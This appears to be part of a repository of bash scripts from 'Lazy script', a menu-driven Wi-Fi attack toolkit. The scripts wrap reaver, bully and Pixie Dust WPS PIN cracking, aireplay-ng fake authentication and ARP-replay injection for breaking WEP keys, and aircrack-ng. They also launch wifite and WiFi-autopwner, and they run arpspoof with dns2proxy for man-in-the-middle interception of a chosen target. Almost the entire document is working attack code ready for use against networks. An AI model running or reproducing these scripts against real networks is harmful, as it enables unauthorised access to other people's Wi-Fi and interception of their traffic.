21 | WLANNM=$(cat /root/lscript/wlanmon.txt)
22 | export WLANNM
23 | function scan_wash
24 | {
25 | while true
26 | do
27 | clear
28 | echo -e "Scaning in new terminal..."
29 | echo -e ""$YS"PRESS CTRL C IN WASH WHEN READY."$CE""
30 | sleep 1
31 | xterm -geometry 80x25+9999+9999 -e "wash -i $WLANNM | tee /root/lscript/tempwash "
32 | clear
33 | wash_awk
34 | if [ $lines = 0 ]
35 | then
36 | echo -e ""$RS"No networks with WPS found nearby"$CE""
37 | fi
38 | echo -e ""$YS" r"$CE") Rescan"
39 | echo -e ""$YS"back"$CE") Go back"
40 | echo -e "Choose: "
41 | read WASHSCAN
42 | if [ $WASHSCAN = "r" ]
43 | then
44 | continue
45 | elif [ $WASHSCAN = "back" ]
46 | then
47 | break
48 | else
49 | WASHSCAN2=${nnum[$WASHSCAN]}
50 | BSSIDT="${abssid[$WASHSCAN2]}"
51 | CHANT="${achannel[$WASHSCAN2]}"
52 | ESSIDT="${aessid[$WASHSCAN2]}"
53 | while true
54 | do
55 | clear
56 | echo -e ""$RS"----------You need strong connection------------"$CE""
57 | echo -e ""$YS" 1"$CE") Pixie dust fast"
58 | echo -e ""$YS" 2"$CE") Bruteforse slow"
59 | echo -e ""$YS" 3"$CE") Bully fast+automated"
60 | echo -e ""$YS" r"$CE") Rescan"
61 | echo -e ""$YS"back"$CE") Go back"
62 | echo -e "Choose: "
63 | read WPSL
64 | if [ $WPSL = "r" ]
65 | then
66 | RESCAN=1
67 | break
68 | elif [ $WPSL = "back" ]
69 | then
70 | break
71 | elif [ $WPSL = "1" ]
72 | then
73 | pixie_attack
74 | elif [ $WPSL = "2" ]
75 | then
76 | reaver_attack
77 | elif [ $WPSL = "3" ]
78 | then
79 | bully_script
80 | fi
81 | done
82 | if [ $RESCAN = 1 ]
83 | then
84 | continue
85 | else
86 | break
87 | fi
88 | fi
89 | done
90 | }
91 | function reaver_attack
92 | {
93 | clear
94 | xterm -geometry 90x70+0+0 -e "sleep 5 && aireplay-ng $WLANNM -1 120 -a $BSSIDT" & disown
95 | reaver -i $WLANNM -b $BSSIDT -v -N -A | tee /root/lscript/wpslog
96 | echo -e "Press "$YS"enter"$CE" to go back"
97 | read
98 | }
99 | function pixie_attack
100 | {
101 | clear
102 | xterm -geometry 90x70+0+0 -e "sleep 5 && aireplay-ng $WLANNM -1 10 -a $BSSIDT" & disown
103 | reaver -i $WLANNM -b $BSSIDT -c $CHANT -K 1 -S -N -A -vvv | tee /root/lscript/wpslog
104 | echo -e "Press "$YS"enter"$CE" to go back"
105 | read
106 | }
107 | function reaver_wpastart
108 | {
109 | reaver -i $WLANNM -b $BSSIDT -p $WPST -vv
110 | echo -e "$PAKTC"
111 | read
112 | }
113 | function associate_aireplay
114 | {
115 | echo -e "Enter your target's BSSID: "
116 | read -e BSSIDT
117 | export BSSIDT
118 | export -f aireplay_command
119 | xterm -e bash -c 'aireplay_command; exec bash'
120 | clear
121 | exec bash "$0"
122 | }
123 | function wash_awk
124 | {
125 | file="/root/lscript/tempwash"
126 | linestotal=$(cat $file | awk 'END{print NR}')
127 | lines=$((linestotal-7))
128 | n=1
129 | if [ $lines != 0 ]
130 | then
131 | echo -e " BSSID CH ESSID"
132 | fi
133 | while [ $n -le "$lines" ]
134 | do
135 | nnn=$((n+7))
136 | nnum[$n]=$nnn
137 | abssid[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $1}')
138 | achannel[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $2}')
139 | aessid[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $6}')
140 | alock[$nnn]=$(cat $file | awk -v nn="$nnn" '{if(NR==nn)print $5}')
141 | if [ $alock[$nnn] = "No" ]
142 | then
143 | locked="$RS"
144 | else
145 | locked="$YS"
146 | fi
147 | size=${#achannel[$nnn]}
148 | if [ $n -le 9 ]
149 | then
150 | if [ $size = 2 ]
151 | then
152 | echo -e " "$locked""$n""$CE") "$locked"${abssid[$nnn]} ${achannel[$nnn]} ${aessid[$nnn]}"$CE""
153 | else
154 | echo -e " "$locked""$n""$CE") "$locked"${abssid[$nnn]} ${achannel[$nnn]} ${aessid[$nnn]}"$CE""
155 | fi
156 | else
157 | if [ $size = 2 ]
158 | then
159 | echo -e ""$locked""$n""$CE") "$locked"${abssid[$nnn]} ${achannel[$nnn]} ${aessid[$nnn]}"$CE""
160 | else
161 | echo -e ""$locked""$n""$CE") "$locked"${abssid[$nnn]} ${achannel[$nnn]} ${aessid[$nnn]}"$CE""
162 | fi
163 | fi
164 | n=$(( n+1 ))
165 | done
166 | }
167 | function bully_script
168 | {
169 | printf '\033]2;BULLY AUTOMATION\a'
170 | while true
171 | do
172 | clear
173 | if [[ $BRUTE = "" ]]
174 | then
175 | BRUTE="OFF"
176 | fi
177 | if [[ $FORCE = "" ]]
178 | then
179 | FORCE="OFF"
180 | fi
181 | if [[ $PIXIE = "" ]]
182 | then
183 | PIXIE="ON"
184 | fi
185 | if [[ $SEQ = "" ]]
186 | then
187 | SEQ="OFF"
188 | fi
189 | if [[ $VERBOSITY = "" ]]
190 | then
191 | VERBOSITY=3
192 | fi
193 | if [[ $IGNORELOCKOUT = "" ]]
194 | then
195 | IGNORELOCKOUT="OFF"
196 | fi
197 | if [[ $LOCKWAIT = "" ]]
198 | then
199 | LOCKWAIT=60
200 | fi
201 | if [[ $WAITPERATTEMPT = "" ]]
202 | then
203 | WAITPERATTEMPT=0
204 | fi
205 | if [[ $BSSIDT = "" || $ESSIDT = "" || $CHANT = "" ]]
206 | then
207 | OK=0
208 | else
209 | OK=1
210 | fi
211 | echo -e ""$YS" 1"$CE") Essid CURRENT:"$ESSIDT""
212 | echo -e ""$YS" 2"$CE") Bssid CURRENT:"$BSSIDT""
213 | echo -e ""$YS" 3"$CE") Channel CURRENT:"$CHANT""
214 | echo -e ""$YS" 4"$CE") Bruteforce Checksum digit CURRENT:"$BRUTE""
215 | echo -e ""$YS" 5"$CE") Pixie wps CURRENT:"$PIXIE""
216 | echo -e ""$YS" 6"$CE") Wait after lock CURRENT:"$LOCKWAIT" secs"
217 | echo -e ""$YS" 7"$CE") Wait per attempt CURRENT:"$WAITPERATTEMPT" secs"
218 | echo -e ""$YS" 8"$CE") Force CURRENT:"$FORCE""
219 | echo -e ""$YS" 9"$CE") Sequential CURRENT:"$SEQ""
220 | echo -e ""$YS"10"$CE") Verbosity CURRENT:"$VERBOSITY""
221 | echo -e ""$YS"11"$CE") Ignore lockout CURRENT:"$IGNORELOCKOUT""
222 | echo -e ""$YS" back"$CE") Go back"
223 | echo -e ""$YS"start"$CE") Start"
224 | echo -e "Choose: "
225 | read B
226 | clear
227 | if [ $B = "back" ]
228 | then
229 | clear
230 | break
231 | elif [ $B = "start" ]
232 | then
233 | if [ $OK = 0 ]
234 | then
235 | echo -e ""$RS"Error 1"$CE""
236 | sleep 3
237 | else
238 | if [[ $BRUTE = "ON" ]]
239 | then
240 | LBRUTE="-B"
241 | else
242 | LBRUTE=""
243 | fi
244 | if [[ $PIXIE = "ON" ]]
245 | then
246 | LPIXIE="-d"
247 | else
248 | LPIXIE=""
249 | fi
250 | if [[ $FORCE = "ON" ]]
251 | then
252 | LFORCE="-F"
253 | else
254 | LFORCE=""
255 | fi
256 | if [[ $SEQ = "ON" ]]
257 | then
258 | LSEQ="-S"
259 | else
260 | LSEQ=""
261 | fi
262 | LVERBOSITY="-v $VERBOSITY"
263 | if [[ $IGNORELOCKOUT = "ON" ]]
264 | then
265 | LIGNORELOCKOUT="-L"
266 | else
267 | LIGNORELOCKOUT=""
268 | fi
269 | bully -b $BSSIDT -e $ESSIDT -c $CHANT -v $VERBOSITY -l $LOCKWAIT -1 $WAITPERATTEMPT,1 $LFORCE $LSEQ $LBRUTE $LPIXIE $LIGNORELOCKOUT $WLANNM
270 | fi
271 | elif [ $B = 1 ]
272 | then
273 | echo -e "Essid:"
274 | read ESSIDT
275 | elif [ $B = 2 ]
276 | then
277 | echo -e "Bssid:"
278 | read BSSIDT
279 | elif [ $B = 3 ]
280 | then
281 | echo -e "Channel:"
282 | read CHANT
283 | elif [ $B = 4 ]
284 | then
285 | if [[ "$BRUTE" = "ON" ]]
286 | then
287 | BRUTE="OFF"
288 | else
289 | BRUTE="ON"
290 | fi
291 | elif [ $B = 5 ]
292 | then
293 | if [[ "$PIXIE" = "ON" ]]
294 | then
295 | PIXIE="OFF"
296 | else
297 | PIXIE="ON"
298 | fi
299 | elif [ $B = 6 ]
300 | then
301 | echo -e "Wait after lock(in seconds): "
302 | read LOCKWAIT
303 | elif [ $B = 7 ]
304 | then
305 | echo -e "Wait per attempt(in seconds): "
306 | read WAITPERATTEMPT
307 | elif [ $B = 8 ]
308 | then
309 | if [[ "$FORCE" = "ON" ]]
310 | then
311 | FORCE="OFF"
312 | else
313 | FORCE="ON"
314 | fi
315 | elif [ $B = 9 ]
316 | then
317 | if [[ "$SEQ" = "ON" ]]
318 | then
319 | SEQ="OFF"
320 | else
321 | SEQ="ON"
322 | fi
323 | elif [ $B = 10 ]
324 | then
325 | while true
326 | do
327 | echo -e "Verbosity (1-4): "
328 | read VERB
329 | clear
330 | if [[ $VERB = 1 || $VERB = 2 || $VERB = 3 || $VERB = 4 ]]
331 | then
332 | VERBOSITY="$VERB"
333 | break
334 | else
335 | echo -e "Number must be 1,2,3 or 4"
336 | sleep 3
337 | fi
338 | done
339 | elif [ $B = 11 ]
340 | then
341 | if [[ "$IGNORELOCKOUT" = "ON" ]]
342 | then
343 | IGNORELOCKOUT="OFF"
344 | else
345 | IGNORELOCKOUT="ON"
346 | fi
347 | fi
348 |
349 | done
350 | }
351 | function main_wps_options
352 | {
353 | while true
354 | do
355 | clear
356 | echo -e "-------------------------"$RS"Finding WPS pin"$CE"-------------------------"
357 | if [[ $ESSIDT = "" ]]
358 | then
359 | echo -e ""$YS" 1"$CE") Scan with wash Selected: "$RS"None"$CE""
360 | else
361 | echo -e ""$YS" 1"$CE") Scan with wash Selected: "$YS"$ESSIDT"$CE""
362 | fi
363 | echo -e ""$YS" 2"$CE") Reaver bruteforce"
364 | echo -e ""$YS" 3"$CE") Reaver (if you already have the WPS pin)"
365 | echo -e ""$YS" 4"$CE") Pixie Dust"
366 | echo -e ""$YS" 5"$CE") Bully AUTOMATED SCRIPT"
367 | echo -e ""$YS" 6"$CE") Bully"
368 | echo -e ""$YS" 7"$CE") WiFi autopwner"
369 | echo -e ""$YS" 8"$CE") See latest log"
370 | echo -e ""$YS" 0"$CE") Exit"
371 | echo -e "Choose: "
372 | read -e YN
373 | clear
374 | if [ "$YN" = "1" ]
375 | then
376 | scan_wash
377 | elif [ "$YN" = "2" ]
378 | then
379 | if [[ $ESSIDT != "" ]]
380 | then
381 | reaver_attack
382 | else
383 | echo -e ""$RS"No network selected"$CE""
384 | sleep 2
385 | fi
386 | elif [ "$YN" = "3" ]
387 | then
388 | if [[ $ESSIDT != "" ]]
389 | then
390 | echo -e "Enter your target's WPS pin: "
391 | read -e WPST
392 | clear
393 | reaver -i $WLANNM -b $BSSIDT -p $WPST -vv
394 | echo -e "Press "$YS"enter"$CE" to go back"
395 | read
396 | else
397 | echo -e ""$RS"No network selected"$CE""
398 | sleep 2
399 | fi
400 |
401 | elif [ "$YN" = "4" ]
402 | then
403 | if [[ $ESSIDT != "" ]]
404 | then
405 | pixie_attack
406 | else
407 | echo -e ""$RS"No network selected"$CE""
408 | sleep 2
409 | fi
410 | elif [ "$YN" = "5" ]
411 | then
412 | if [ -f /usr/bin/bully ]
413 | then
414 | if [[ $ESSIDT != "" ]]
415 | then
416 | bully_script
417 | else
418 | echo -e ""$RS"No network selected"$CE""
419 | sleep 2
420 | fi
421 | else
422 | echo -e ""$RS"Bully isn't installed.Please install it from lscript."$CE""
423 | sleep 3
424 | echo -e "$PAKTGB"
425 | $READAK
426 | fi
427 | elif [ "$YN" = "6" ]
428 | then
429 | if [ -f /root/bully/src/bully.py ]
430 | then
431 | cd /root/bully/src
432 | ./bully.py
433 | cd
434 | else
435 | echo -e ""$RS"Bully wasn't found in /root .Please install it from lscript."$CE""
436 | sleep 3
437 | echo -e "$PAKTGB"
438 | $READAK
439 | fi
440 | elif [ "$YN" = "7" ]
441 | then
442 | if [ -f /root/WiFi-autopwner/wifi-autopwner.sh ]
443 | then
444 | cd /root/WiFi-autopwner
445 | ./wifi-autopwner.sh
446 | cd
447 | else
448 | echo -e ""$RS"Wifi autopwner wasn't found in /root .Please install it from lscript."$CE""
449 | sleep 3
450 | echo -e "$PAKTGB"
451 | $READAK
452 | fi
453 | elif [ "$YN" = "8" ]
454 | then
455 | cat /root/lscript/wpslog
456 | echo -e "Press "$YS"enter"$CE" to go back"
457 | read
458 | elif [ "$YN" = "0" ]
459 | then
460 | exit
461 | fi
462 | done
463 | }
464 |
465 | ####################################
466 | main_wps_options
467 |
--------------------------------------------------------------------------------
/lh31:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | #############DEFAULTS###############
3 | #setting yellow-start
4 | YS="\e[1;33m"
5 | #setting color-end
6 | CE="\e[0m"
7 | #setting red-start
8 | RS="\e[1;31m"
9 | #setting frequent stings
10 | YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=yes)"
11 | YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=no)"
12 | YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
13 | PAKT="Press "$YS"any key$CE to"
14 | PAKTC="Press "$YS"any key$CE to continue..."
15 | PAKTGB="Press "$YS"any key$CE to go back..."
16 |
17 | ####################################
18 | printf '\033]2;REAVER\a' &&
19 | WLANNM=$(cat /root/lscript/wlanmon.txt)
20 | export WLANNM
21 | if [ "$GLV" = "2" ]
22 | then
23 | echo -e "Please note that you need a very good signal for this to work."
24 | sleep 3
25 | echo -e "Starting..."
26 | sleep 1
27 | clear
28 | reaver -i $WLANNM -b $BSSIDT -d $DELT -S -N -c $CHANT -vv
29 | echo -e "$PAKTC"
30 | read
31 | elif [ "$GLV" = "3" ]
32 | then
33 | reaver -i $WLANNM -b $BSSIDT -p $WPST -vv
34 | echo -e "$PAKTC"
35 | read
36 |
37 | fi
38 |
--------------------------------------------------------------------------------
/lh4:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | #############DEFAULTS###############
3 | #setting yellow-start
4 | YS="\e[1;33m"
5 | #setting color-end
6 | CE="\e[0m"
7 | #setting red-start
8 | RS="\e[1;31m"
9 | #setting frequent stings
10 | YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=yes)"
11 | YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=no)"
12 | YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
13 | PAKT="Press "$YS"any key$CE to"
14 | PAKTC="Press "$YS"any key$CE to continue..."
15 | PAKTGB="Press "$YS"any key$CE to go back..."
16 |
17 | ####################################
18 | WLANNM=$(cat /root/lscript/wlanmon.txt)
19 | export WLANNM
20 | echo -e "---------------------------"$RS"WEP hacking"$CE"---------------------------"
21 | printf '\033]2;WEP MENU\a'
22 | if [ ! -z ${WEPB+x} ]
23 | then
24 | echo -e "BSSID: $WEPB"
25 | else
26 | echo -e "Target's BSSID not set"
27 | fi
28 | if [ ! -z ${WEPC+x} ]
29 | then
30 | echo -e "Channel: $WEPC"
31 | else
32 | echo -e "Target's channel not set"
33 | fi
34 | echo -e ""$YS" w"$CE") WifiTe All attacks"
35 | echo -e ""$YS" 1"$CE") Scan for nearby networks"
36 | echo -e ""$YS" 2"$CE") Start capturing ivs"
37 | echo -e ""$YS" 3"$CE") Fakeauth-arpreplay If no clients connected"
38 | echo -e ""$YS" 4"$CE") Fakeauth-fragmentation not yet"
39 | echo -e ""$YS" 5"$CE") Chop-chop not yet"
40 | echo -e ""$YS" 6"$CE") Aircrack the ivs"
41 | echo -e ""$YS" 7"$CE") WiFi autopwner - automated tool"
42 | #~ echo -e ""$YS"00"$CE") Main menu"
43 | echo -e ""$YS" 0"$CE") EXIT"
44 | echo -e "Choose: "
45 | read WEP
46 | if [ "$WEP" = "1" ]
47 | then
48 | clear
49 | airodump-ng $WLANNM
50 | elif [ "$WEP" = "2" ]
51 | then
52 | WEP=-1
53 | echo -e "Enter your target's bssid: "
54 | read -e WEPB
55 | echo -e "Enter your target's channel: "
56 | read -e WEPC
57 | echo -e "Enter the name of the file(no extension): "
58 | echo -e "(don't use the same name twice)"
59 | read -e WEPF
60 | WEPFF="/root/handshakes/WEP/$WEPF-01.cap"
61 | export WEPB
62 | export WEPC
63 | export WEPF
64 | export WEPFF
65 | gnome-terminal -e lh41
66 | elif [ "$WEP" = "w" ]
67 | then
68 | clear
69 | wifite
70 | elif [ "$WEP" = "3" ]
71 | then
72 | gnome-terminal -e lh43
73 | gnome-terminal -e lh42
74 | #~ elif [ "$WEP" = "4" ]
75 | #~ then
76 | #~ clear
77 | #~ elif [ "$WEP" = "5" ]
78 | #~ then
79 | #~ clear
80 | elif [ "$WEP" = "6" ]
81 | then
82 | aircrack-ng $WEPFF
83 | elif [ "$WEP" = "7" ]
84 | then
85 | cd /root/WiFi-autopwner
86 | ./wifi-autopwner.sh
87 | cd
88 | elif [ "$WEP" = "0" ]
89 | then
90 | clear
91 | exit
92 | #~ elif [ "$WEP" = "00" ]
93 | #~ then
94 | #~ clear
95 | #~ exec bash "$0"
96 | else
97 | clear
98 | echo -e "Wrong choice"
99 | sleep 0.3
100 | clear
101 | exec bash "$0"
102 | fi
103 | echo -e "Choose again?"$YNYES": "
104 | read -e CAG
105 | if [ "$CAG" = "n" ]
106 | then
107 | clear
108 | exit
109 | else
110 | if [ "$WEP" = "1" ]
111 | then
112 | exec bash "$0"
113 | else
114 | clear
115 | exec bash "$0"
116 | fi
117 | fi
118 |
--------------------------------------------------------------------------------
/lh41:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | WLANNM=$(cat /root/lscript/wlanmon.txt)
3 | export WLANNM
4 | printf '\033]2;CAPTURING IVs\a'
5 | echo -e "Leave me opened."
6 | sleep 1
7 | airodump-ng --bssid $WEPB -c $WEPC -w /root/handshakes/WEP/$WEPF $WLANNM
8 |
--------------------------------------------------------------------------------
/lh42:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | #############DEFAULTS###############
3 | #setting yellow-start
4 | YS="\e[1;33m"
5 | #setting color-end
6 | CE="\e[0m"
7 | #setting red-start
8 | RS="\e[1;31m"
9 | #setting frequent stings
10 | YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=yes)"
11 | YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=no)"
12 | YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
13 | PAKT="Press "$YS"any key$CE to"
14 | PAKTC="Press "$YS"any key$CE to continue..."
15 | PAKTGB="Press "$YS"any key$CE to go back..."
16 |
17 | ####################################
18 | printf '\033]2;FAKEAUTH\a'
19 | WLANNM=$(cat /root/lscript/wlanmon.txt)
20 | export WLANNM
21 | echo -e "Press \e[1;33many key\e[0m to start fake authentication..."
22 | read
23 | while true
24 | do
25 | echo -e "--------------------"$RS"Fake authentication"$CE"----------------------"
26 | if [ "$FIRST" = "1" ]
27 | then
28 | aireplay-ng -1 0 -a $WEPB -h $MYMAC $WLANNM
29 | else
30 | echo -e "Getting you MAC...."
31 | sleep 1
32 | MYMAC=$(ifconfig $WLANNM | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
33 | echo -e "Your MAC is $MYMAC"
34 | sleep 1
35 | echo -e "Starting fake-authentication..."
36 | sleep 1
37 | FIRST="1"
38 | aireplay-ng -1 0 -a $WEPB -h $MYMAC $WLANNM
39 | fi
40 | echo -e "Re-fakeauth again?"$YNYES": "
41 | read REF
42 | if [ "$REF" = "n" ]
43 | then
44 | exit
45 | else
46 | clear
47 | continue
48 | fi
49 | done
50 |
--------------------------------------------------------------------------------
/lh43:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | #############DEFAULTS###############
3 | #setting yellow-start
4 | YS="\e[1;33m"
5 | #setting color-end
6 | CE="\e[0m"
7 | #setting red-start
8 | RS="\e[1;31m"
9 | #setting frequent stings
10 | YNYES="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=yes)"
11 | YNNO="("$YS"y"$CE"/"$YS"n"$CE")("$YS"Enter"$CE"=no)"
12 | YNONLY="("$YS"y"$CE"/"$YS"n"$CE")"
13 | PAKT="Press "$YS"any key$CE to"
14 | PAKTC="Press "$YS"any key$CE to continue..."
15 | PAKTGB="Press "$YS"any key$CE to go back..."
16 |
17 | ####################################
18 | printf '\033]2;PACKET INJECTION\a'
19 | WLANNM=$(cat /root/lscript/wlanmon.txt)
20 | export WLANNM
21 | while true
22 | do
23 | echo -e "----------------------"$RS"Packet injection"$CE"-----------------------"
24 | echo -e "You need to do the Fake-authentication first!(on the other terminal)"
25 | if [ "$FIRSTT" = "1" ]
26 | then
27 | aireplay-ng -3 -b $WEPB -h $MYMAC $WLANNM
28 | else
29 | echo -e "$PAKT start fake authentication..."
30 | read
31 | echo -e "Getting you MAC...."
32 | sleep 1
33 | MYMAC=$(ifconfig $WLANNM | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
34 | echo -e "Your MAC is $MYMAC"
35 | sleep 1
36 | echo -e "Starting packet injection..."
37 | sleep 1
38 | FIRSTT="1"
39 | aireplay-ng -3 -b $WEPB -h $MYMAC $WLANNM
40 | fi
41 | echo -e "Inject packets again?"$YNYES": "
42 | read REF
43 | if [ "$REF" = "n" ]
44 | then
45 | exit
46 | else
47 | clear
48 | continue
49 | fi
50 | done
51 |
--------------------------------------------------------------------------------
/ls/l131.sh:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | cd
3 | cd dns2proxy
4 | python /root/dns2proxy/dns2proxy.py
5 | read
6 |
--------------------------------------------------------------------------------
/ls/l132.sh:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | arpspoof -i $GATEINT -t $TARGIP $GATENM
3 | read
4 |
--------------------------------------------------------------------------------
/ls/l133.sh:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | arpspoof -i $GATEINT -t $GATENM $TARGIP
3 | read
4 |
--------------------------------------------------------------------------------
/uninstall.sh:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | function nounistall
3 | {
4 | echo -e "I knew you are still lazy :D :D "
5 | sleep 2
6 | echo -e "If you want any feature to be added, contact me on FB"
7 | sleep 2
8 | echo -e " "
9 | echo -e "Aris"
10 | sleep 1
11 | exit
12 | }
13 | echo -e "Do you really want to uninstall the Lazy script from your system?(y/n)(Enter=no): "
14 | read CHUN
15 | if [ "$CHUN" = "y" ]
16 | then
17 | echo -e "If you have any problems please contact me first."
18 | echo -e "Do you still wanna get rid of me?(y/n)(Enter=no): "
19 | read CHCHUN
20 | if [ "$CHCHUN" = "y" ]
21 | then
22 | echo -e "Ok, uninstalling everything that has to do with lscript on your system"
23 | sleep 4
24 | rm -r /bin/lscript
25 | echo -e "Done."
26 | sleep 1
27 | echo -e "You need to manually delete the lscript folder from your /root/ directory though..."
28 | sleep 2
29 | echo -e "Press any key to exit..."
30 | read
31 | exit
32 | else
33 | nounistall
34 | fi
35 | else
36 | nounistall
37 | fi
38 |
--------------------------------------------------------------------------------
/version.txt:
--------------------------------------------------------------------------------
1 | 2.0.5
2 |
--------------------------------------------------------------------------------